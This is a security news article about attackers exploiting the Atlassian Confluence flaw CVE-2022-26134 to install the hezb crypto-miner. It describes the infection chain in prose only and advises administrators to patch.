Hackers targeting unpatched Atlassian Confluence servers to deploy crypto-miners

Atlassian Confluence server hack

A now-patched critical security flaw affecting Atlassian Confluence Server that was disclosed a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.

“If not patched and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as complete domain takeover of infrastructure and deployment information thieves, remote access Trojans (RATs) and ransomware,” said a Trend Micro threat researcher. Sunil Bharti said in a report.

The problem, followed as CVE-2022-26134 (CVSS score: 9.8), was tackled by the Australian software company in June 2022.

cyber security

In one of the infection chains observed by the cybersecurity firm, the flaw was exploited to download and execute a shell script (“ro.sh”) on the victim’s machine, which in turn recovered a second shell script (“ap.sh”).

The malicious code is designed to update the PATH variable to include additional paths such as “/tmp”, download the cURL utility (if not already present) from a remote server, disable the iptables firewall, abuse the Default PwnKit (CVE-2021-4034) to gain root privileges and ultimately deploy the hezb crypto-miner.

Like other cryptojacking attacks, the shell script also terminates other competing coin miners, disables agents from cloud service providers Alibaba and Tencent, before performing a lateral move via SSH.

The findings mirror similar mining attempts previously disclosed by Lace, Microsoft, Sophosand Akamai in June.

cyber security

Lacework’s analysis further shows that the command and control (C2) server used to fetch the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” which allows the malware to kill the processes of interest.

Users are advised to prioritize fixing the flaw as it could be exploited by malicious actors for other nefarious purposes.

“Attackers could take advantage of injecting their own code for interpretation and access to the targeted Confluence domain, as well as carrying out attacks ranging from controlling the server for subsequent malicious activity to damaging the infrastructure itself. “, said Bharti.

You may also like

Leave a Comment

About Us

Times Global Will keep you updated To the Latest News Around The Globe..

Feature Posts


Subscribe my Newsletter for new blog posts, tips & new photos. Let's stay updated!

Subscribe To our Newsletter

Join our subscribers list and get Latest News directly to your inbox.